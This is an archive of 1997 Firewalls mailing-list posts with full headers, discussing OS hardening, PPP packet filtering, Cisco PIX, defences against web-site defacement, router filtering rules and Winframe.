> hardening over B1 any day. (Yes you need a non production IE no network
> code kernel for maintenance mode.)
>
>
> -Charles Kaplan
>

--
Jon F. Spencer                    spencerj@rtp.dg.com (uunet!rtp.dg.com!spencerj)
Data General Corp.                Phone : (919)248-6246
62 T.W. Alexander Dr, MS #119     FAX : (919)248-6108
Research Triangle Park, NC 27709  Office RTP 121/9

Reality is an illusion - perception is what counts.
No success can compensate for failure in the home. President David O. McKay
***** UCC 1-207 ********

From firewalls-owner Mon Jan 6 14:44:06 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA00297 for firewalls-outgoing; Mon, 6 Jan 1997 14:20:08 -0800 (PST)
Received: from omsk.quadrix.com ([208.210.34.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA00288 for ; Mon, 6 Jan 1997 14:19:54 -0800 (PST)
Received: by omsk.quadrix.com (4.1/SMI-4.1) id AA04330; Mon, 6 Jan 97 17:17:32 EST
Date: Mon, 6 Jan 97 17:17:32 EST
From: bve@omsk.quadrix.com (BVE)
Message-Id: <9701062217.AA04330@omsk.quadrix.com>
To: marcg@arraycomm.com
Cc: firewalls@greatcircle.com
Subject: RE: packet filtering on PPP interfaces
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I figured that someone would've answered this one by now, but I haven't seen a message on the list....

Is anyone aware of ppp implementation that include packet filtering? Or of (nit-based?) packet filtering implementations that could be applied to a ppp interface under Solaris 1 (Solaris 1.2 to be exact)?

I once set up Morningstar PPP (on SunOs 4.1.3u1) to protect a small Unix box from the Internet. It was a while ago, so I don't remember all the details, but it provided what (at the time) seemed like a fairly good set of features, for that type of software. It was pretty simple to configure.... I don't know if it's good enough for your needs, but it's a place to start....

--
Bill Van Emburg                  Phone: 908-235-2335
Quadrix Solutions, Inc.
Fax: 908-235-2336                (bve@quadrix.com)
Check out http://yourtown.com!   (http://quadrix.com)
"You do what you want, and if you didn't, you don't"

From firewalls-owner Mon Jan 6 15:04:15 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA01607 for firewalls-outgoing; Mon, 6 Jan 1997 14:54:32 -0800 (PST)
Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA01597 for ; Mon, 6 Jan 1997 14:54:21 -0800 (PST)
From: proff@suburbia.net
Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with SMTP id OAA19063 for ; Mon, 6 Jan 1997 14:54:31 -0800 (PST)
Received: (qmail 23172 invoked by uid 110); 6 Jan 1997 22:53:03 -0000
Message-ID: <19970106225303.23171.qmail@suburbia.net>
Subject: Re: NCSA != NCSC
In-Reply-To: <199701062100.QAA10279@splinter.rtp.dg.com> from Jon Spencer at "Jan 6, 97 04:00:33 pm"
To: spencerj@dg-rtp.dg.com (Jon Spencer)
Date: Tue, 7 Jan 1997 09:53:03 +1100 (EST)
Cc: ckaplan@nohackers.com, firewalls@greatcircle.com
X-Mailer: ELM [version 2.4ME+ PL28 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> > How about an OS that fingerprinted all its apps, or added extra file
> > attributes (not generatable during run-time operation) that were necessary
> > for execution. Then if the kernel didn't see this stuff it shuts down.
> > This way you could delete from the PRODUCTION system all likely tools
> > (chown, chmod, telnet, rxx, mknod, ifconfig, route, etc) and if the villain
> > tried to add his/her own the box would croak. I would take that type of
> > hardening over B1 any day. (Yes you need a non production IE no network
> > code kernel for maintenance mode.)
> >
> >
> > -Charles Kaplan

I wouldn't. How about the application sitting in your stack?

-Julian Assange

From firewalls-owner Mon Jan 6 15:08:11 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA01030 for firewalls-outgoing; Mon, 6 Jan 1997 14:40:17 -0800 (PST)
Received: from hp5.xlconnect.com ([166.80.10.159]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA01012 for ; Mon, 6 Jan 1997 14:40:05 -0800 (PST)
Received: by hp5.xlconnect.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFBF8.5B942FC0@hp5.xlconnect.com>; Mon, 6 Jan 1997 17:37:58 -0500
Message-ID:
From: "Larson, Erik"
To: "'keithstevens@acsinc.net'" , "'Firewalls-Digest@GreatCircle.com'"
Subject: RE: Cisco PIX
Date: Mon, 6 Jan 1997 17:40:15 -0500
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I like the PIX in concept and sometimes in practice. I do wish it offered client software to allow remote VPN access, however. That particular feature is critical in much of the work we do for our customer base.

-ekl

>-----Original Message-----
>From: keithstevens@acsinc.net [SMTP:keithstevens@acsinc.net]
>Sent: Sunday, January 05, 1997 11:14 PM
>To: Firewalls-Digest@GreatCircle.com
>Subject: Cisco PIX
>
>Is there a bastion host / proxy server that out-performs
>Cisco's PIX in throughput? Security? Ease of implementation?
>From my limited perspective as a newbie, the Cisco PIX in
>combination with a good screening router is a very good
>firewall. Not to be a wise guy, I'm seriously asking, with this
>technology available, is there ever a reason to build one from
>scratch? I might be able to do it cheaper - but if it takes a couple
>weeks or a month to do it might cost more. I'm not in any way
>affiliated with Cisco.
>KeithStevens
>keith@acsinc.net
>

From firewalls-owner Mon Jan 6 18:37:09 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA06595 for firewalls-outgoing; Mon, 6 Jan 1997 15:59:20 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id PAA06506 for firewalls@greatcircle.com; Mon, 6 Jan 1997 15:58:53 -0800 (PST)
Received: from odin.cmp.ilstu.edu (odin.cmp.ilstu.edu [138.87.1.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA24278 for ; Thu, 2 Jan 1997 16:55:50 -0800 (PST)
From: mrwilhe@odin.cmp.ilstu.edu
Received: from socrates-11.isbe.state.il.us by odin.cmp.ilstu.edu (AIX 4.1/UCB 5.64/4.03) id AA22944; Thu, 2 Jan 1997 18:54:41 -0600
Message-Id: <1.5.4.32.19970103005926.008e412c@odin.cmp.ilstu.edu>
X-Sender: mrwilhe@odin.cmp.ilstu.edu
X-Mailer: Windows Eudora Light Version 1.5.4 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 02 Jan 1997 18:59:26 -0600
To: firewalls@GreatCircle.COM
Subject: airfhack--secure/hacked web server
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

for some reason this was not posted the first time i sent it:

On the idea of the ram mem--it would have to be something special--only changed by physical means (rebooting?)--one could not inflict something of non-physical forces to change the ram. (sorta like bios holding a passwd--you can clear the password by taking the chip out -- yes i know there are ways around this, but something similar for the ram mem/disk would suffice to keep it from being hacked.

Another statement that was brought up was that cd-rom or other write once or a physical write lock on the hard drive (hd prob more practical) would being able to change the page often-- my statement i made at first was meant for only sites that don't change their pages often -- not pages such as www.news.com. I don't believe that the main pages of the cia/dia/fbi/nsa/ni/and other sites that hold stats.....
change their pages that often.

fsh

<<>>

The following are some of the major points made on this subject (sorry if i left out some).

"Seriously: why not just put it on a separate disk which is mounted
> read-only? If you want to go further, you could buy a suitable harddisk
> which can be write-locked by hardware. regards:jamie"

" The Web server would have to be based on all write once media -- from the
> Operating systems and all other aspects, otherwise the attacker would just
> redirect the homepage contents to a hard drive.
Doesn't matter, I could just launch a server that redirected you to a site with the content mirrored and altered, or serve the pages out of memory, or off of RAM disk."
From: "Paul D. Robertson"

"A CD-ROM -based web server would be fine if you created web pages, pressed a CD, and then never again expected to add/delete/modify the content. But this is The Real World (tm)."
Mark Johnson

"Not to disagree with anything Paul has said, because I don't, but the original premise was government web sites not high volume web sites. How often does the Air Force's web pages need to change? Not too often I would wager, they don't *need* re-visits, they don't have advertising (at least I would expect they don't, I haven't checked actually), they are there just to provide some mostly static information. Given that, I think there is merit to a write-once media approach. But not, as Paul and others point out, as a general solution."
Dave Kinchlea

[from Michael Idengren:]
> I don't know about the rest of you but I agree with the idea of putting a
> webserver on a CD-ROM.

[from Thomas Leitner:]
> why not just put it on a separate disk which is mounted
> read-only?

[from Dale Drew:]
> Using a CDROM web-server doesn't provide resistance to an
> attacker who gains access to the system as ROOT...

Keep in mind that this entire thread assumes that the attacker will *not* take an easier approach, such as compromising the DNS records that point to the server. In this case, the attacker can create any web content they like, spend all the time in the world creating it, and then quickly convince the DNS servers that www.foo.com now resolves to the new (fake) address. Securing your www server is just a first (although important) step.

I do think read-only media is an interesting idea, by the way :) Dale is right though, there are still vulnerabilities. Personally, I like the idea of marking the files immutable myself. This way, even root can't change the content unless the machine is brought down into single-user mode. Not sure how many other operating systems support this other than (the great) BSDI though.

Happy new year (2 minutes to go...),
Norm

1. My comment was partially meant as a joke, it's horribly impractical for ISP's and Universities and such to require operator intervention every time a webpage needs to be updated. Such a level of paranoia *might* only be appropriate for government agencies and authoritative advanced research sites.
From: Michael Idengren

From firewalls-owner Mon Jan 6 18:38:37 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA12310 for firewalls-outgoing; Mon, 6 Jan 1997 17:13:09 -0800 (PST)
Received: from whisp.cs.uow.edu.au (whisp.cs.uow.edu.au [130.130.64.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA12301 for ; Mon, 6 Jan 1997 17:12:58 -0800 (PST)
Received: from strauss.cs.uow.edu.au (strauss.cs.uow.edu.au [130.130.64.97]) by whisp.cs.uow.edu.au (8.8.4/8.7.3) with ESMTP id MAA08536 for ; Tue, 7 Jan 1997 12:12:28 +1100 (EST)
From: Kok Seng Tan
Received: (from kst01@localhost) by strauss.cs.uow.edu.au (8.8.4/8.7.1) id MAA16949 for firewalls@greatcircle.com; Tue, 7 Jan 1997 12:12:26 +1100 (EST)
Message-Id: <199701070112.MAA16949@strauss.cs.uow.edu.au>
Subject: ATM Firewalls
To: firewalls@greatcircle.com
Date: Tue, 7 Jan 1997 12:12:24 +1100 (EST)
X-Mailer: ELM [version 2.4ME+ PL11 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

I am looking for information on ATM Firewalls. Anyone can help with some references, URLs ?

--
==============================================================
Steven K.S. Tan @ The University of Wollongong, NSW, Australia
Email Address : kst01@uow.edu.au
Tel : 61-42-261152
==============================================================

From firewalls-owner Mon Jan 6 18:41:28 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA15857 for firewalls-outgoing; Mon, 6 Jan 1997 18:05:24 -0800 (PST)
Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA15848 for ; Mon, 6 Jan 1997 18:05:14 -0800 (PST)
Received: from mhoward-pc.cisco.com (dhcp-vm1-2-202.cisco.com [171.68.164.202]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id SAA17870; Mon, 6 Jan 1997 18:04:26 -0800 (PST)
Message-Id: <2.2.32.19970107021039.008cb3d8@diablo.cisco.com>
X-Sender: mhoward@diablo.cisco.com
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Mon, 06 Jan 1997 18:10:39 -0800
To: "Larson, Erik" , "'keithstevens@acsinc.net'" , "'Firewalls-Digest@GreatCircle.com'"
From: Matthew Howard
Subject: RE: Cisco PIX
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In the mill. The Private Link Encryption card today supports AH/ESP tunnel mode, with DES (cbc). We need to do some additional testing with client software.

matt

At 05:40 PM 1/6/97 -0500, Larson, Erik wrote:
>I like the PIX in concept and sometimes in practice. I do wish it
>offered client software to allow remote VPN access, however. That
>particular feature is critical in much of the work we do for our
>customer base.
>
>-ekl
>
>
>
>>-----Original Message-----
>>From: keithstevens@acsinc.net [SMTP:keithstevens@acsinc.net]
>>Sent: Sunday, January 05, 1997 11:14 PM
>>To: Firewalls-Digest@GreatCircle.com
>>Subject: Cisco PIX
>>
>>Is there a bastion host / proxy server that out-performs
>>Cisco's PIX in throughput? Security? Ease of implementation?
>>From my limited perspective as a newbie, the Cisco PIX in
>>combination with a good screening router is a very good
>>firewall. Not to be a wise guy, I'm seriously asking, with this
>>technology available, is there ever a reason to build one from
>>scratch? I might be able to do it cheaper - but if it takes a couple
>>weeks or a month to do it might cost more. I'm not in any way
>>affiliated with Cisco.
>>KeithStevens
>>keith@acsinc.net
>>
>
>

Matthew Howard                 Product Line Manager
mhoward@cisco.com              Internet Business Unit
408-526-4720 (voice)           Cisco Systems Inc.
408-527-8122 (fax)             170 West Tasman Drive
Building VM2 (corner of First & Vista Montana)
San Jose, CA 95134

From firewalls-owner Mon Jan 6 18:59:08 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05830 for firewalls-outgoing; Mon, 6 Jan 1997 15:52:00 -0800 (PST)
Received: from relay-11.mail.demon.net (relay-11.mail.demon.net [194.217.242.137]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id PAA05763 for ; Mon, 6 Jan 1997 15:51:25 -0800 (PST)
Received: from tracker.demon.co.uk ([158.152.150.126]) by relay-9.mail.demon.net id ae900666; 6 Jan 97 23:04 GMT
From: Les Carleton
To: Xavier Fauquet
Cc: firewalls@greatcircle.com
Subject: Re: Using Remote Workstation as Hole??
Date: Mon, 06 Jan 1997 23:04:03 GMT
Organization: The Doghouse
Reply-To: les@tracker.demon.co.uk
Message-ID: <32d982eb.505212@post.demon.co.uk>
References: <19970106081219047.AAA228@kafka.imatranet.com>
In-Reply-To: <19970106081219047.AAA228@kafka.imatranet.com>
X-Mailer: Forte Agent .99g/32.339
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 6 Jan 1997 00:49:13 +0100, you wrote:
>Could someone points me to a site explaining me what is
>Winframe ?

I think ...
http://www.cytrix.com ?

Winframe is a remote processing system which allows PC clients to run server applications on a Windows system rather than using their own processing power.

I think.

...Les...

From firewalls-owner Mon Jan 6 19:19:18 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05177 for firewalls-outgoing; Mon, 6 Jan 1997 15:45:00 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id PAA05158 for firewalls@greatcircle.com; Mon, 6 Jan 1997 15:44:49 -0800 (PST)
Received: from mtymail.avantel-icom.com.mx ([200.33.228.147]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA26523 for ; Fri, 3 Jan 1997 07:20:42 -0800 (PST)
Received: by mtymail.avantel-icom.com.mx with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF957.1EE0F1B0@mtymail.avantel-icom.com.mx>; Fri, 3 Jan 1997 09:18:45 -0600
Message-ID:
From: Ricardo Alvarado
To: "firewalls@GreatCircle.COM"
Subject: Re: internal filtering router - filter config?
Date: Fri, 3 Jan 1997 09:20:46 -0600
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>What type of things would you filter on the internal router? or even
>the external router? I am going to be installing a firewall real soon
>and would really appreciate any help.
>
>-steve.
>matkoski@dreamscape.com

In your external router you'd block any ICMP traffic going back and forth, as well as any packets bearing one of your internal IP addresses as a source address, especially if these are going INTO your protected network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill any ports that your users will not be using, and leave just mail, web, ftp, etc.
ricardo
ralvarado@avantel.com.mx

From firewalls-owner Mon Jan 6 19:23:29 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05042 for firewalls-outgoing; Mon, 6 Jan 1997 15:44:07 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id PAA03172 for firewalls@greatcircle.com; Mon, 6 Jan 1997 15:21:01 -0800 (PST)
Received: from procion.ulpgc.es (procion.ulpgc.es [193.145.133.21]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA15845 for ; Fri, 3 Jan 1997 03:52:41 -0800 (PST)
Received: by procion.ulpgc.es; id AA16311; Fri, 3 Jan 1997 11:52:08 GMT
Received: from cic.teleco.ulpgc.es by fobos.ulpgc.es (5.65/Ultrix4.2-C) id AA06684; Fri, 3 Jan 1997 11:54:08 GMT
Received: from neumann.teleco.ulpgc.es by cic (4.1/SMI-4.1) id AA08241; Fri, 3 Jan 97 11:57:52 GMT
Received: from NEUMANN/CORREO by neumann.teleco.ulpgc.es (Mercury 1.12); Fri, 3 Jan 97 12:02:03 +00
Received: from CORREO by NEUMANN (Mercury 1.12); Fri, 3 Jan 97 12:01:57 +00
From: "JUAN JOSE JOVER BARBERO"
To: firewalls@greatcircle.com
Date: Fri, 3 Jan 1997 12:01:50 GMT
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Subject: help in spanish
X-Mailer: Pegasus Mail v3.22
Message-Id: <197A811904@neumann.teleco.ulpgc.es>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Please, I don't speak English very well. If anybody knows where I can find books on firewalls in Spanish I'll be more happy. Send me directions to obtain those books via ftp or another way.

PS: I am doing my final-year degree project at the University of Las Palmas de Gran Canaria and I am a bit lost with English. I appreciate your help.

------------------------------------------------------
UNIVERSIDAD DE LAS PALMAS DE GRAN CANARIA
JUAN JOSE JOVER BARBERO
STUDENT OF TELECOMMUNICATIONS TECHNICAL ENGINEERING
------------------------------------------------------

From firewalls-owner Mon Jan 6 20:09:32 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA21695 for firewalls-outgoing; Mon, 6 Jan 1997 19:50:42 -0800 (PST)
Received: from thor.tjhsst.edu (thor.tjhsst.edu [198.38.16.100]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA21677 for ; Mon, 6 Jan 1997 19:50:30 -0800 (PST)
Received: from localhost.tjhsst.edu (localhost.tjhsst.edu [127.0.0.1]) by thor.tjhsst.edu (8.8.4/8.8.2) with SMTP id DAA26466; Tue, 7 Jan 1997 03:50:03 GMT
Message-Id: <199701070350.DAA26466@thor.tjhsst.edu>
To: Kok Seng Tan
cc: firewalls@greatcircle.com, jcroall@foo.org
Subject: Re: ATM Firewalls
In-reply-to: Your message of "Tue, 07 Jan 1997 12:12:24 EST." <199701070112.MAA16949@strauss.cs.uow.edu.au>
Date: Mon, 06 Jan 1997 22:50:01 EST
From: "James Croall"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In message <199701070112.MAA16949@strauss.cs.uow.edu.au>, Kok Seng Tan writes:
>I am looking for information on ATM Firewalls. Anyone can help with some
>references, URLs ?

Network Systems Corp. seems to have a very interesting product on the horizon. Might want to take a look at www.network.com/netcom/products/security/atm/

---
James B.
Croall
jcroall@foo.org

From firewalls-owner Tue Jan 7 03:59:48 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA14740 for firewalls-outgoing; Tue, 7 Jan 1997 03:48:16 -0800 (PST)
Received: from nova.dcrt.nih.gov (nova.dcrt.nih.gov [128.231.230.74]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id DAA14733 for ; Tue, 7 Jan 1997 03:48:04 -0800 (PST)
Received: (from eric@localhost) by nova.dcrt.nih.gov (8.7.5/8.7.3) id GAA17174 for firewalls@greatcircle.com; Tue, 7 Jan 1997 06:53:30 -0500
From: "Eric K. Dickinson"
Message-Id: <199701071153.GAA17174@nova.dcrt.nih.gov>
Subject: Web Site Hacking
To: firewalls@greatcircle.com
Date: Tue, 7 Jan 1997 06:53:30 -0500 (EST)
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am wondering if this is a suitable solution. Could one not set up a passive defence by overwriting the presented home-pages at a predetermined time and at some other trigger such as a write or copy. Any unauthorized action could also be used as a trigger to just "overwrite". The real home-page could be anywhere accessible only by the OS itself or another hardened location not presented to the world. I am used to the Unix world and have more experience there than NT.

Any Ideas? Thoughts? Or is this out in left field?

eric@nova.dcrt.nih.gov

From firewalls-owner Tue Jan 7 06:14:15 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA18281 for firewalls-outgoing; Tue, 7 Jan 1997 05:46:05 -0800 (PST)
Received: from deere-bh.dx.deere.com (deere-bh.dx.deere.com [207.122.201.66]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA18268 for ; Tue, 7 Jan 1997 05:45:53 -0800 (PST)
Received: (from uucp@localhost) by deere-bh.dx.deere.com (8.6.12/8.6.11) id HAA06277; Tue, 7 Jan 1997 07:46:13 -0600
Received: from deere.dx.deere.com by deere-bh.dx.deere.com via smap (V1.3) id sma006080; Tue Jan 7 07:45:49 1997
Received: from 90.deere.com (dts.90.deere.com) by deere.dx.deere.com (4.1/SMI-4.0) id AA27573; Tue, 7 Jan 97 07:45:00 CST
Received: from dogbert by 90.deere.com (SMI-8.6/SMI-SVR4) id HAA18288; Tue, 7 Jan 1997 07:43:00 -0600
Message-Id: <32D252E4.155B@90.deere.com>
Date: Tue, 07 Jan 1997 07:43:00 -0600
From: Bert Carroll
X-Mailer: Mozilla 3.0 (X11; I; SunOS 5.5.1 sun4u)
Mime-Version: 1.0
To: Andrew Hobson
Cc: Michael Warfield , firewalls@GreatCircle.COM
Subject: Re: Christopher Klaus and ISS
References: <199701061733.MAA06710@arden.iss.net>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Like many others I'm not interested in flaming Chris Klaus or have time to. I still think the subject of web server security needs its own list (not firewalls) and needs a leader (someone smarter than me) to moderate the list.
Bert Carroll
bc17684@90.deere.com

From firewalls-owner Tue Jan 7 07:12:43 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA19755 for firewalls-outgoing; Tue, 7 Jan 1997 06:41:21 -0800 (PST)
Received: from exch-bel1.attachmate.com (exch-bel1.attachmate.com [149.82.1.46]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA19748 for ; Tue, 7 Jan 1997 06:41:08 -0800 (PST)
Received: by exch-bel1.attachmate.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFC65.7CAC8C80@exch-bel1.attachmate.com>; Tue, 7 Jan 1997 06:39:09 -0800
Message-ID:
From: Darren Cromer
To: "'Xavier Fauquet'" , "'les@tracker.demon.co.uk'"
Cc: "'firewalls@GreatCircle.COM'"
Subject: RE: Using Remote Workstation as Hole??
Date: Tue, 7 Jan 1997 06:39:11 -0800
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Actually I believe it is www.citrix.com

>----------
>From: Les Carleton[SMTP:les@tracker.demon.co.uk]
>Sent: Monday, January 06, 1997 6:04 PM
>To: Xavier Fauquet
>Cc: firewalls@GreatCircle.COM
>Subject: Re: Using Remote Workstation as Hole??
>
>On Mon, 6 Jan 1997 00:49:13 +0100, you wrote:
>>Could someone points me to a site explaining me what is
>>Winframe ?
>
>I think ... http://www.cytrix.com ?
>
>Winframe is a remote processing system which allows PC clients to run server
>applications on a Windows system rather than using their own processing
>power.
>
>I think.
>
>...Les...
>

From firewalls-owner Tue Jan 7 08:00:08 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20547 for firewalls-outgoing; Tue, 7 Jan 1997 06:52:43 -0800 (PST)
Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA20538 for ; Tue, 7 Jan 1997 06:52:30 -0800 (PST)
From: long-morrow@CS.YALE.EDU
Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id JAA08316; Tue, 7 Jan 1997 09:51:24 -0500 (EST) sender long-morrow@CS.YALE.EDU for
Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id JAA27171; Tue, 7 Jan 1997 09:51:19 -0500 (EST)
Date: Tue, 7 Jan 1997 09:51:19 -0500 (EST)
Message-Id: <199701071451.JAA27171@SPARKY.CF.CS.YALE.EDU>
To: ahobson@mindspring.com, bc17684@90.deere.com
Subject: re: Web server security, was Re: Christopher Klaus and ISS
Cc: firewalls@GreatCircle.COM, mhw@arden.iss.net
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Bert Carroll wrote:
>Like many others I'm not interested in Flaming Chris Klaus or have time
>to. I still think the subject of web server security needs its own list
>(not firewalls) and needs a leader (someone smarter than me) to moderate
>the list.

I'm not certain how much they talk about specific server security problems (vs. basic HTTP protocol security issues) but I found this in the WWW Security FAQ [http://www-genome.wi.mit.edu/WWW/faqs/wwwsf1.html#Q8] V 1.3.0, Nov 8 1996 by Lincoln D. Stein :

...
A mailing list devoted specifically to issues of WWW security is maintained by the IETF Web Transaction Security Working Group. To subscribe, send e-mail to www-security-request@nsmx.rutgers.edu. In the body text of the message write:

SUBSCRIBE www-security your_email_address
...
- Morrow

From firewalls-owner Tue Jan 7 09:14:46 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA26604 for firewalls-outgoing; Tue, 7 Jan 1997 08:58:32 -0800 (PST)
Received: from sdg.hon.com (galip.vnet.net [166.82.174.200]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA26573 for ; Tue, 7 Jan 1997 08:58:14 -0800 (PST)
Received: from sdg.hon.com (sdg.hon.com [166.82.174.200]) by sdg.hon.com (NTMail 3.02.10) with ESMTP id ea000004 for ; Tue, 7 Jan 1997 11:54:16 -0600
Message-ID: <32D27FB5.2F8C@hon.com>
Date: Tue, 07 Jan 1997 11:54:13 -0500
From: Steve
Reply-To: Steve@hon.com
Organization: sdg consulting
X-Mailer: Mozilla 3.01Gold (WinNT; I)
MIME-Version: 1.0
To: "Eric K. Dickinson"
CC: firewalls@greatcircle.com
Subject: Re: Web Site Hacking
References: <199701071153.GAA17174@nova.dcrt.nih.gov>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Info: Evaluation version at sdg.hon.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Eric K. Dickinson wrote:
>
> I am wondering if this is a suitable solution. Could one not set up a passive
> defence by overwriting the presented home-pages at a predetermined time and
> at some other trigger such as a write or copy. Any unauthorized action could
> also be used as a trigger to just "overwrite". The real home-page could be
> anywhere accessible only by the OS itself or another hardened location not
> presented to the world. I am used to the Unix world and have more experience
> there than NT.
>
> Any Ideas? Thoughts? Or is this out in left field?
>
> eric@nova.dcrt.nih.gov

Eric,

A very interesting thought..but firewalls are supposed to prevent users from being able to tamper in the first place. But, I for one am going to give that more serious consideration as I see its possibilities for use on maybe another machine on the LAN to check on the status of say a web server.

Thanks for the idea..

Steve
Steve@hon.com
sdg consulting

From firewalls-owner Tue Jan 7 11:44:51 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA03751 for firewalls-outgoing; Tue, 7 Jan 1997 11:15:06 -0800 (PST)
Received: from interlock.reston.ans.net (interlock.reston.ans.net [192.77.167.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA03732 for ; Tue, 7 Jan 1997 11:14:55 -0800 (PST)
From: oconnor@reston.ans.net
Received: by interlock.reston.ans.net id AA02945 (InterLock SMTP Gateway 3.0 for firewalls@greatcircle.com); Tue, 7 Jan 1997 14:13:39 -0500
Message-Id: <199701071913.AA02945@interlock.reston.ans.net>
Received: by interlock.reston.ans.net (Internal Mail Agent-1); Tue, 7 Jan 1997 14:13:39 -0500
Date: Tue, 7 Jan 1997 14:10:05 -0500
To: firewalls@greatcircle.com
Subject: Re: Web Site Hacking
Cc: eric@nova.dcrt.nih.gov, Steve@hon.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Md5: bzvhJJeSv+2vI5mraVRQ7w==
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Today's Washington Post had a brief article regarding the ForceField product from TIS which is apparently intended to address this issue. Unfortunately you have to register to find out anything specific about the package, e.g. which OS it replaces/augments. They do tell you the price however :-). I've registered but the implication is that the more specific information will be sent surface mail.
Mike

From firewalls-owner Tue Jan 7 12:26:56 1997
